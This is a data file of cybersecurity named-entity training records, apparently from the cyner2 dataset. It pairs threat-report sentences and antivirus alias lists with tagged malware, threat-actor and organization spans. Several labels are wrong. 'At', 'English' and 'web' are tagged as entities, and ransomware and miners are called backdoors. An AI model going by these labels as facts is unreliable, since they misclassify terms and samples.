{"text": "A backdoor also known as: Backdoor.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9928 W32/Trojan.GELV-4208 Backdoor.MSIL.Bladabindi.akrb Trojan.Win32.Bladabindi.extavb Backdoor.Msil.Bladabindi!c Msil.Backdoor.Bladabindi.Wmjd BackDoor.Bladabindi.13678 Backdoor.Bladabindi.Win32.8723 Trojan.MSIL.Injector Trojan:Win32/Vb.At TR/Crypt.fkm.udrkf Trojan[Backdoor]/MSIL.Bladabindi Trojan.MSIL.Bladabindi.1 Trojan.Win32.Z.Bladabindi.192000.A Backdoor.MSIL.Bladabindi.akrb Trojan:MSIL/Inmalsal.A MSIL/Kryptik.GJY!tr Trj/GdSda.A Win32/Trojan.BO.610", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004422", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Constructor.Win32.Houndhack!O Backdoor.Venik.MUE.J2 Trojan/Farfli.bwm BKDR_VENIK_EL150010.UVPM Constructor.Win32.Houndhack.a Riskware.Win32.Houndhack.erbccv Trojan.DownLoader17.62076 BKDR_VENIK_EL150010.UVPM BehavesLike.Win32.Backdoor.dc HackTool[Constructor]/Win32.Houndhack Trojan.Zusy.D35C86 Constructor.Win32.Houndhack.a Backdoor:Win32/Venik.J Backdoor/Win32.Venik.R169912 Constructor.Houndhack Constructor.Houndhack! Trojan.Constructor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004423", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.BitCoinMiner.ZM Trojan.BitMiner Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.BitCoinMiner.agl Riskware.Win64.BitMiner.ewyekq BehavesLike.Win32.AdwareLinkury.vc PUA/CoinMiner.B Trojan/Win32.BitCoinMiner Trojan.Win32.BitCoinMiner.agl Trojan.Win32.BitcoinMiner", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004424", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Small!O Trojan.Maptsc Trojan.Small.Win32.19366 Trojan.Heur.RP.EAC7EB TROJ_SMALL.NHQ Trojan.Win32.Small.cpb Trojan.Win32.Small.ebpbhy Troj.W32.Small.cpb!c Trojan.Click2.55177 TROJ_SMALL.NHQ Trojan.Win32.Small W32/Trojan.ZWIN-6050 Trojan/Small.ovd TR/Spy.6656.172 Trojan/Win32.Small Trojan:Win32/Maptsc.A Trojan.Win32.Small.cpb Trojan/Win32.Connapts.C256364 Trojan.Small.cpb Trojan.Small Win32.Trojan.Small.Edod Trojan.Click!cGVrs+boA6s Win32/Trojan.4c4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004425", "source": "cyner2_train"}}
{"text": "More information from PWC about Sofacy Bedep malware using DGA CozyDuke aka CozyBear, CozyCar or Office Monkeys is a threat actor that became increasingly active in the 2nd half of 2014 and hit a variety of targets.", "spans": {"ORGANIZATION: PWC": [[22, 25]], "MALWARE: Sofacy Bedep malware": [[32, 52]], "THREAT_ACTOR: CozyDuke aka CozyBear, CozyCar": [[63, 93]], "THREAT_ACTOR: Office Monkeys": [[97, 111]], "THREAT_ACTOR: threat actor": [[117, 129]]}, "info": {"id": "cyner2_train_004430", "source": "cyner2_train"}}
{"text": "In the email screenshot with our added machine translation from Russian, notice the subject line and message body text reflecting a business customer upset about extra charges on his credit card social engineering theme.", "spans": {"SYSTEM: added machine translation": [[33, 58]], "ORGANIZATION: a business customer": [[130, 149]]}, "info": {"id": "cyner2_train_004434", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.GarusenV.Trojan Worm/W32.Vobfus.225280 Worm.Win32.Vobfus!O W32/Vobfus.io Trojan.Barys.950 WORM_VOBFUS.SM02 Win32.Trojan.VBObfus.f WORM_VOBFUS.SM02 Win.Trojan.Vobfus-28 Worm.Win32.Vobfus.biec Trojan.Win32.WBNA.cihuhh Worm.Win32.A.Vobfus.225280 TrojWare.Win32.Pronny.EE Trojan.VbCrypt.60 BehavesLike.Win32.VBObfus.dm Worm.Win32.Vobfus Worm/WBNA.dfdh WORM/Vobfus.dbmnua Worm.Win32.Vobfus.biec Trojan/Win32.Vobfus.R36953 BScope.Trojan.Diple Win32/Pronny.EJ W32/Vobfus.GEW.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004435", "source": "cyner2_train"}}
{"text": "These have been the attacks on Saudi Arabian companies where a destructive malware known as Disttrack was deployed.", "spans": {"ORGANIZATION: Saudi Arabian companies": [[31, 54]], "MALWARE: destructive malware": [[63, 82]], "MALWARE: Disttrack": [[92, 101]]}, "info": {"id": "cyner2_train_004438", "source": "cyner2_train"}}
{"text": "In addition, we found that the infrastructure used in this case overlaps with FindPOS/PoSeidon as well as Chanitor and sits amidst a cluster of largely indiscriminate malicious activity.", "spans": {"MALWARE: FindPOS/PoSeidon": [[78, 94]], "MALWARE: Chanitor": [[106, 114]]}, "info": {"id": "cyner2_train_004439", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Chifrax.150357 Trojan.Chifrax.rw5 Trojan/Chifrax.a BKDR_POISON.VA W32/Poison.AX Backdoor.Odivy Win32/Poison.AAE BKDR_POISON.VA Win.Trojan.Poison-11 Trojan.Win32.Chifrax.a Trojan.Win32.Chifrax.fwpet Trojan.DownLoader9.38925 Trojan.Chifrax.Win32.1349 BehavesLike.Win32.Dropper.cc W32/Poison.HQGF-3018 Trojan/Chifrax.epp TR/Drop.PoisonIvy.C.1 W32/Chifrax.A!tr Trojan/Win32.Chifrax Troj.W32.Chifrax.a!c TrojanDropper:Win32/Poisonivy.C Win-Trojan/Poisonivy.150357 Trojan.Chifrax Win32/Poison.NGS Win32.Trojan.Chifrax.Wskn Trojan.Chifrax!Xo07JnrMN1M Trojan.Win32.Chifrax Trj/Chifrax.C Win32/Trojan.954", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004440", "source": "cyner2_train"}}
{"text": "A backdoor also known as: AIT:Trojan.Autoit.CLU Win32.Trojan-Dropper.Autoit.l W32/Trojan.TWFF-1697 AIT:Trojan.Autoit.CLU Trojan.Win32.Beast.exaenx AIT:Trojan.Autoit.CLU BackDoor.Beast BehavesLike.Win32.PUPXAI.dh AIT:Trojan.Autoit.CLU Trojan.Autoit.F AIT:Trojan.Autoit.CLU AIT:Trojan.Autoit.CLU Trj/CI.A Win32/Trojan.0fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004441", "source": "cyner2_train"}}
{"text": "Chikdos is a malware that targeted MySQL servers to make them conduct distributed denial-of-service DDoS attacks against other websites.", "spans": {"MALWARE: Chikdos": [[0, 7]], "MALWARE: malware": [[13, 20]], "SYSTEM: MySQL servers": [[35, 48]]}, "info": {"id": "cyner2_train_004442", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Tartober BKDR_TARTOBER.A Win32.Trojan.WisdomEyes.16070401.9500.9999 BScope.Trojan-Spy.Zbot BKDR_TARTOBER.A Trojan.Win32.Wisp.zraky BackDoor.Wisp.11 BehavesLike.Win32.Trojan.dc W32/Trojan.TTYH-5266 Trojan.Zusy.Elzob.D39B5 Backdoor:Win32/Tartober.A Trj/CI.A Win32/Trojan.e6d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004445", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom/W32.WannaCry.5267459.F Ransom.Zenshirsh.SL8 Ransom.WannaCrypt Trojan/Exploit.CVE-2017-0147.a Win32.Worm.Rbot.a Ransom.Wannacry Ransom_WCRY.SMJ Win.Ransomware.WannaCry-6313787-0 Win32.Exploit.CVE-2017-0147.A Trojan-Ransom.Win32.Wanna.m Trojan.Win32.Wanna.epxkni Trojan.Win32.WannaCry.5267459 Troj.Ransom.W32.Wanna.toP0 Trojan.Encoder.11432 Trojan.Wanna.Win32.98 Ransom_WCRY.SMJ BehavesLike.Win32.RansomWannaCry.tt Trojan.Wanna.k TR/WannaCrypt.ahdyg Trojan[Ransom]/Win32.Wanna Trojan:Win32/Eqtonex.F!dha Trojan-Ransom.Win32.Wanna.m Trojan/Win32.WannaCryptor.R200894 Hoax.Wanna Trj/GdSda.A Win32/Exploit.CVE-2017-0147.A Exploit.CVE-2017-0147! Trojan.Win32.Exploit W32/Wanna.M!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004447", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.TrojanPigax Trojan-Downloader.Win32.Small.akrf Trojan-Downloader.Win32.Small.akrf TR/Dldr.Small.akrf Trojan.Dldr.Small.akrf Trojan-Downloader.Win32.Small.akrf Trojan-Downloader.Win32.Small W32/Small.AKRF!tr.dldr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004448", "source": "cyner2_train"}}
{"text": "REDBALDKNIGHT, also known as BRONZE BUTLER and Tick, is a cyberespionage group known to target Japanese organizations such as government agencies including defense as well as those in biotechnology, electronics manufacturing, and industrial chemistry.", "spans": {"THREAT_ACTOR: REDBALDKNIGHT,": [[0, 14]], "THREAT_ACTOR: BRONZE BUTLER": [[29, 42]], "THREAT_ACTOR: Tick,": [[47, 52]], "THREAT_ACTOR: cyberespionage group": [[58, 78]], "ORGANIZATION: Japanese organizations": [[95, 117]], "ORGANIZATION: government agencies": [[126, 145]], "ORGANIZATION: biotechnology, electronics manufacturing,": [[184, 225]], "ORGANIZATION: industrial chemistry.": [[230, 251]]}, "info": {"id": "cyner2_train_004450", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.NaviPromo.3 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Lipler.B!packed TROJ_SKINTRI.SMC Trojan.Win32.Hrup.aah Troj.Downloader.W32.Lipler.lcwl TROJ_SKINTRI.SMC Trojan/Win32.Hrup Trojan:Win32/Skintrim.C Trojan.Win32.Hrup.aah Win32.Trojan.Hrup.Ajvd Trojan.Win32.Skintrim W32/Skintrim.CG!tr Win32/Trojan.IM.c6f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004451", "source": "cyner2_train"}}
{"text": "Ursnif campaigns against EU and mainly Italy spreaded by a JScript", "spans": {"THREAT_ACTOR: Ursnif campaigns": [[0, 16]], "SYSTEM: JScript": [[59, 66]]}, "info": {"id": "cyner2_train_004452", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Autorun.Worm.aaeh Win32.Trojan.WisdomEyes.16070401.9500.9867 TSPY_TEPFER.GB Trojan.Win32.VBTrojan.bvufrt TrojWare.Win32.VB.HR Trojan.DownLoader10.21377 TSPY_TEPFER.GB BehavesLike.Win32.Swisyn.cc Trojan:Win32/Beelog.C Trojan.Win32.Jorik.28672.A Trojan/Win32.Jorik.R44838 Trj/CI.A Win32/Trojan.Downloader.f2c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004453", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Yaha.S W32/Yaha.aa@MM Trojan.Heur.ED1374C Win32.Trojan.WisdomEyes.16070401.9500.9777 W32.Yaha.AE@mm Win32/Yaha.Y Win.Worm.Yaha-8 Email-Worm.Win32.Lentin.s Trojan.Win32.Lentin.emzf I-Worm.Win32.Yaha.60304 Win32.Worm-email.Lentin.Wvki TrojWare.Win32.Patched.KSU Win32.HLLM.Yaha.7 W32/Yaha.aa@MM WORM/Lentin.S Worm[Email]/Win32.Lentin Worm:Win32/Yaha.AA@mm Backdoor.W32.Bifrose.l4Wh Email-Worm.Win32.Lentin.s Trojan.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004456", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heur.Win32.Veebee.1!O Trojan.VB.rw3 Trojan.Happili Trojan.Inject!SEi/RTfcvEo W32/Backdoor2.HUHI TROJ_SPNR.0BD714 Trojan.Win32.Inject.kxez Trojan.Win32.Inject.cwbjpa Trojan.Boaxxe.2 Trojan.Inject.Win32.72022 TR/Dropper.VB.6820 TROJ_SPNR.0BD714 Trojan/Win32.Inject Win32.Troj.Inject.kx.kcloud W32/Backdoor.PZSO-6760 TScope.Trojan.VB Trj/WLT.A Win32/Boaxxe.BL Win32.Trojan.Inject.Sxek Virus.Win32.VBInject W32/Zbot.RZIM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004457", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-PWS/W32.Hukle.157044 Trojan.Hukle.Win32.18 Trojan/PSW.Hukle.o Trojan.PWS.Hukle!uPlO8aKf2dU W32/Trojan2.GWXZ Infostealer.Hukle TROJ_HUKLE.O Win.Trojan.Hukle-16 Trojan-PSW.Win32.Hukle.o Trojan.Win32.Hukle.dhvf Troj.PSW32.W.Hukle.o!c TrojWare.Win32.PSW.Hukle.~R Trojan.PWS.Hukle.145 TROJ_HUKLE.O BehavesLike.Win32.PWSZbot.ch W32/Trojan.TBYH-4941 Trojan/Hiddukel.t W32/Hukle.O!tr.pws Trojan[PSW]/Win32.Hukle Trojan.Zusy.Elzob.D3190 Win-Trojan/Hukle.151040 PWS:Win32/Hukle.O Trojan-PWS.Win32.Hukle Trojan.Win32.InfoStealer.o", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004458", "source": "cyner2_train"}}
{"text": "The vulnerability comes from the interaction of the mechanism that enforces JavaScript context separation the same origin policy and Firefox's PDF Viewer.", "spans": {"VULNERABILITY: vulnerability": [[4, 17]], "VULNERABILITY: JavaScript": [[76, 86]], "SYSTEM: Firefox's PDF Viewer.": [[133, 154]]}, "info": {"id": "cyner2_train_004459", "source": "cyner2_train"}}
{"text": "The email message and the lure document are written in Hebrew, Arabic or English – depending on the target audience.", "spans": {"ORGANIZATION: English": [[73, 80]]}, "info": {"id": "cyner2_train_004462", "source": "cyner2_train"}}
{"text": "The adversary's campaign has active and operational Command and Control C2 servers.", "spans": {"THREAT_ACTOR: The adversary's campaign": [[0, 24]]}, "info": {"id": "cyner2_train_004463", "source": "cyner2_train"}}
{"text": "A one-man cybercriminal operation that uses point-of-salePoS malware has stolen more than 22,000 unique credit card numbers from terminals in Brazil,Canada, and the United States in a span of just one month.", "spans": {"THREAT_ACTOR: cybercriminal operation": [[10, 33]], "MALWARE: point-of-salePoS malware": [[44, 68]]}, "info": {"id": "cyner2_train_004466", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/OnlineGames.LWBP Worm.Autorun-4618 Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R Trojan.PWS.Wsgame.22668 Win32/Oflwr.A!crypt Heur:Trojan/PSW.OnlineGames BScope.HackTool.Sniffer.WpePro Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004467", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakelsasLTD1.Trojan Trojan.Win32.Small!O Trojan.Upatre.S1164383 Trojan/Downloader.Small.aab Win32.Trojan.Inject.bm W32/Trojan.TBSZ-0334 Win32/Upatre.Q TROJ_BANLOAD.KAV Win.Trojan.Rubinurd-67 Trojan.Win32.Small.cpl Trojan.Win32.Small.ciwsuw TrojWare.Win32.Injector.AH Trojan.DownLoad3.28161 Trojan.Bublik.Win32.12106 TROJ_BANLOAD.KAV BehavesLike.Win32.PWSZbot.dh Backdoor.Win32.Androm W32/Trojan3.GBH Trojan/Small.oxi Trojan/Win32.Bublik Trojan.Win32.Small.cpl Trojan:Win32/Dorv.D!rfn Worm/Win32.Palevo.C199836 Trojan.Small Trojan.Email.FA Trojan.Small.AAB Win32/TrojanDownloader.Small.AAB Trojan.Bublik!BrbaRvXyIc8 W32/Bublik.AAB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004468", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Backdoor.80", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004470", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Exxroute.A3 Trojan.Ransom.Lukitos.1 Ransom_CERBER.SM37 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Ramnit!dr Ransom_CERBER.SM37 Trojan.PWS.Sphinx.2 BehavesLike.Win32.Ransomware.cc Trojan:Win32/CeeInject.MJ!bit Trojan/Win32.Fareit.R189070 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004471", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.WisdwslD.Trojan TrojanDownloader.Esaprof.A4 Trojan.Strictor.D542D Trojan.Esaprof Win32/SillyDL.YTP TROJ_ESAPROF_EK2501B4.UVPM SWF.Plicker.1 TROJ_ESAPROF_EK2501B4.UVPM BehavesLike.Win32.Dropper.wc TrojanDownloader:SWF/Esaprof.B Trojan.Win32.Downloader.3514368[UPX] Trojan.Downloader Trj/CI.A SWF/TrojanDownloader.Esaprof.A Trojan.Patched", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004473", "source": "cyner2_train"}}
{"text": "A spear-phishing email was sent to a diplomat of the Embassy of Uzbekistan who is likely based in Beijing, China.", "spans": {"ORGANIZATION: diplomat of the Embassy of Uzbekistan": [[37, 74]]}, "info": {"id": "cyner2_train_004475", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.SocksT.Trojan Worm.Win32.Socks!O Trojan.Zbot.EO4 Worm.Socks.Win32.38 W32.W.Socks.tnAV W32/Socks.ey TROJ_SPNR.14DL13 Win32.Trojan.Kryptik.el Win32/Tnega.McRJca TROJ_SPNR.14DL13 Win.Trojan.Ag-4254306-1 Worm.Win32.Socks.ey Trojan.Win32.Socks.wtnjo Worm.Win32.Socks.791340 BackDoor.FireOn.221 BehavesLike.Win32.VirRansom.tc Trojan-Spy.Zbot.BE Trojan/PSW.Almat.dwk W32.Infostealer.Zeus Worm/Win32.Socks Worm.Socks.ey.kcloud Worm.Socks Worm.Win32.Socks.ey Worm/Win32.Socks.C35688 Virus.Socks.ey Worm.Socks!MDTxLrvAMvg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004477", "source": "cyner2_train"}}
{"text": "Turla, which has been targeting governments, government officials and diplomats for years – see, as an example, this recent paper – is still using watering hole techniques to redirect potentially interesting victims to their C C infrastructure.", "spans": {"THREAT_ACTOR: Turla,": [[0, 6]], "ORGANIZATION: governments, government officials": [[32, 65]], "ORGANIZATION: diplomats": [[70, 79]], "SYSTEM: C C infrastructure.": [[225, 244]]}, "info": {"id": "cyner2_train_004478", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.DostoxaLTB.Trojan Trojan.Mogoogwi.A3 WORM_MOGOOGWI.SMHA Win32.Trojan.WisdomEyes.16070401.9500.9996 WORM_MOGOOGWI.SMHA Trojan-Dropper.MSIL Trojan:MSIL/Mogoogwi.A Trojan.Barys.DC996 Trojan/Win32.Zusy.R154407 Trj/CI.A Win32/Trojan.65a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004479", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.A8 Trojan.Ransom.Globe Win32.Trojan.WisdomEyes.16070401.9500.9595 Ransom.Purge Ransom_PURGE.SM1 Win32.Trojan-Ransom.Globe.A Trojan-Ransom.Win32.Purga.v Win32.Trojan.Purga.Hvjx Trojan.Encoder.6182 BehavesLike.Win32.Sytro.kc W32/Trojan.DXHE-6024 Trojan.CryFile.co Trojan[Ransom]/Win32.CryFile Troj.Ransom.W32!c Trojan-Ransom.Win32.Purga.v Ransom:Win32/Contentocrypt.A Trojan/Win32.CryFile.R186838 TrojanDropper.Dapato Ransom.Globe Trojan.Filecoder!iQ4fX8DOQ4o Trj/GdSda.A Win32/Trojan.Ransom.524", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004482", "source": "cyner2_train"}}
{"text": "Taiwan has long been subjected to persistent targeting from espionage motivated threat actors.", "spans": {"THREAT_ACTOR: espionage motivated threat actors.": [[60, 94]]}, "info": {"id": "cyner2_train_004483", "source": "cyner2_train"}}
{"text": "This attack chain exposed millions of potential victims in the US, Canada, the UK, and Australia, leveraging slight variations on a fake browser update scheme that worked on all three major Windows web browsers.", "spans": {"SYSTEM: Windows web browsers.": [[190, 211]]}, "info": {"id": "cyner2_train_004484", "source": "cyner2_train"}}
{"text": "Our investigation into these attacks has unearthed more details into the method by which the threat actors delivered the Disttrack payload.", "spans": {"THREAT_ACTOR: the threat actors": [[89, 106]], "MALWARE: Disttrack payload.": [[121, 139]]}, "info": {"id": "cyner2_train_004485", "source": "cyner2_train"}}
{"text": "We re constantly following, detecting and monitoring the lifecycle of these RATs as they appear, disappear and often reappear under a new moniker.", "spans": {}, "info": {"id": "cyner2_train_004486", "source": "cyner2_train"}}
{"text": "Shipping companies and medical laboratories in Asia are being targeted in a likely intelligence-gathering campaign that relies exclusively on publicly available and living-off-the-land tools.", "spans": {"ORGANIZATION: Shipping companies": [[0, 18]], "ORGANIZATION: medical laboratories": [[23, 43]], "THREAT_ACTOR: intelligence-gathering campaign": [[83, 114]]}, "info": {"id": "cyner2_train_004487", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Spy/W32.Small.8704.J Trojan-Spy.Win32.Small!O TrojanDownloader.Dielel Troj.Spy.W32.Small.jzk!c TROJ_GOGLOAD.A Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.IOOK-0066 TROJ_GOGLOAD.A Trojan-Spy.Win32.Small.jzk DLOADER.Trojan Trojan.Win32.Spy DangerousObject.Multi.bcf W32/Small.JZK!tr Trojan[Spy]/Win32.Small Win32.Troj.small.j.kcloud Trojan.Heur.LP.EEE6A9 Trojan-Spy.Win32.Small.jzk TrojanDownloader:Win32/Dielel.A TrojanSpy.Small Win32.Trojan-spy.Small.Iit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004488", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: Trojan.Linux.MiraiDDoS.BI Downloader.Mirai.Linux.8 Troj.Downloader.Linux!c ELF_MIRAI.A HEUR:Trojan-Downloader.Linux.Mirai.b Trojan.Linux.MiraiDDoS.BI Trojan.Mlw.ektbyu Trojan.Linux.MiraiDDoS.BI Trojan.Linux.MiraiDDoS.BI Linux.DownLoader.289 ELF_MIRAI.A LINUX/Dldr.Mirai.qqlgv Trojan[Downloader]/Linux.Gafgyt.b Trojan.Linux.MiraiDDoS.BI Linux.S.Mirai.1204 HEUR:Trojan-Downloader.Linux.Mirai.b TrojanDownloader:Linux/Mirai.A Backdoor.Linux.Mirai Linux.Trojan-downloader.Gafgyt.Amlt Trojan-Downloader.Linux.Mirai Trojan.Linux.MiraiDDoS.BI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004491", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.Verauto.A Win32.Worm.Verauto.A Trojan/VB.oda Win32.Worm.Verauto.A W32/VB.OO Virus.Win32.VB.b Win32.Worm.Verauto.A Virus.Win32.VB.gixe W32.VB.b!c Win32.Virus.Vb.Swum Win32.Worm.Verauto.A Virus.Win32.VB.b Win32.Worm.Verauto.A Win32.HLLW.Verauto Virus.VB.Win32.76 worm.win32.vobfus.cf W32/VB.YYAQ-1388 WORM/Verauto.A Virus/Win32.VB Worm:Win32/SillyVB.B Win32.Worm.Verauto.A Trojan.VB Win32/VB.ODA .Virus.EICAR_BOOV Worm.Win32.VB W32/VB.B!tr Win32/VB.BM", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004499", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanSpy.MSIL Win32.Trojan.WisdomEyes.16070401.9500.9866 Trojan.Win32.Downeks.exeslg Troj.Spy.Msil.Downeks!c Trojan.MSILPerseus.D21B6F TrojanSpy:MSIL/Tinclex.A Riskware.Confuser! Trj/GdSda.A Win32/Trojan.Spy.7a8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004501", "source": "cyner2_train"}}
{"text": "The malware, which has been identified by many vendors on VirusTotal, has been labeled by our researchers as Trojan.Chinad or just Chinad as an alternative short label.", "spans": {"MALWARE: malware,": [[4, 12]], "ORGANIZATION: VirusTotal,": [[58, 69]], "MALWARE: Chinad": [[131, 137]]}, "info": {"id": "cyner2_train_004503", "source": "cyner2_train"}}
{"text": "The group behind the attacks is possibly associated with the Russian government and has been active since at least 2007.", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: Russian government": [[61, 79]]}, "info": {"id": "cyner2_train_004504", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.BCDE Backdoor.Baceed Backdoor.Hupigon.Win32.11548 Backdoor.W32.Hupigon.torp W32/Backdoor2.EVBN Backdoor.Trojan Win.Trojan.Hupigon-27433 Backdoor.Win32.Hupigon.gklq Trojan.Win32.Hupigon.wnxa Backdoor.Win32.Hupigon.163840.I Backdoor.Win32.Hupigon.gklqo BackDoor.Pigeon1.8593 W32/Backdoor.ECNM-9194 Backdoor/Hupigon.jmk W32.Backdoor.Hupigon BDS/Baceed.hrhsh Trojan[Backdoor]/Win32.Hupigon Backdoor:Win32/Baceed.A!bit Backdoor.Win32.Hupigon.gklq Trojan/Win32.Hupigon.R42586 TScope.Malware-Cryptor.SB Win32.Backdoor.Hupigon.Pavs Backdoor.Win32.Hupigon Win32/Trojan.aab", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004505", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.Crypt12 Ransom.Kristina Ransom_CRYPTWELVE.B Win32.Trojan.WisdomEyes.16070401.9500.9562 Ransom.CryptXXX Ransom_CRYPTWELVE.B Win.Ransomware.Kristina-6367716-1 MSIL.Trojan-Ransom.Crypt12.B Trojan.Win32.Encoder.evktgv Trojan.Win32.Z.Ransom.124928.G Trojan.Encoder.15080 Trojan.Filecoder.Win32.6738 Ransom.MSIL.Natiris W32/Trojan.ERVC-5011 TR/RedCap.khogd Ransom:MSIL/Natiris.A Trojan/Win32.Ransom.C2247299 Trj/GdSda.A Win32/Trojan.Ransom.15c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004506", "source": "cyner2_train"}}
{"text": "First we got the Linux variant, and with information extracted from its binary, we were able to find the variant for Windows desktops, too.", "spans": {"SYSTEM: Linux variant,": [[17, 31]], "MALWARE: binary,": [[72, 79]], "SYSTEM: Windows desktops,": [[117, 134]]}, "info": {"id": "cyner2_train_004508", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Esacel Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Kryptik.exqpjd Trojan.Kryptik.Win32.1351348 W32/Trojan.MCPS-3536 TR/Crypt.ZPACK.ocodu Trojan.Esacel Trj/CI.A Trojan.Kryptik!MH3d/6dQFBI Trojan.Inject Malicious_Behavior.SB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004512", "source": "cyner2_train"}}
{"text": "At FireEye Labs, we recently detected the resurgence of a coin mining campaign with a novel and unconventional infection vector in the form of an iFRAME inline frame – an HTML document embedded inside another HTML document on a web page that allows users to get content from another separate source and display it within the main web page – embedded in a PE binary Portable Executable Binary, or .exe.", "spans": {"MALWARE: At": [[0, 2]], "ORGANIZATION: FireEye Labs,": [[3, 16]], "THREAT_ACTOR: coin mining campaign": [[58, 78]], "VULNERABILITY: infection vector": [[111, 127]], "ORGANIZATION: web": [[228, 231]]}, "info": {"id": "cyner2_train_004514", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.QHost.ACI Trojan.Win32.Qhost!O Trojan.QHost.ACI TROJ_RENOS.TU Win32.Trojan.WisdomEyes.16070401.9500.9838 W32/Trojan.YCCB-6079 Trojan.Dropper TROJ_RENOS.TU Win.Trojan.Small-4579 Trojan.Win32.Qhost.abh Trojan.QHost.ACI Trojan.Win32.Qhost.slro Trojan.QHost.ACI TrojWare.Win32.TrojanDownloader.FakeAlert.G Trojan.QHost.ACI Trojan.Fakealert.399 BehavesLike.Win32.Dropper.nc W32/Trojan2.CMAE Trojan/Qhost.tf Trojan:Win32/Wantvi.C Trojan.Win32.Qhost.abh Trojan.QHost.ACI Trojan/Win32.Qhost.R34501 Trojan.QHost.ACI OScope.Hoax.Win32.FakeAlert Trojan.Qhost Win32/TrojanDownloader.FakeAlert.G Trojan.Qhost.EP Trojan.Win32.Qhost.abh W32/Qhost.ABH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_004515", "source": "cyner2_train"}}
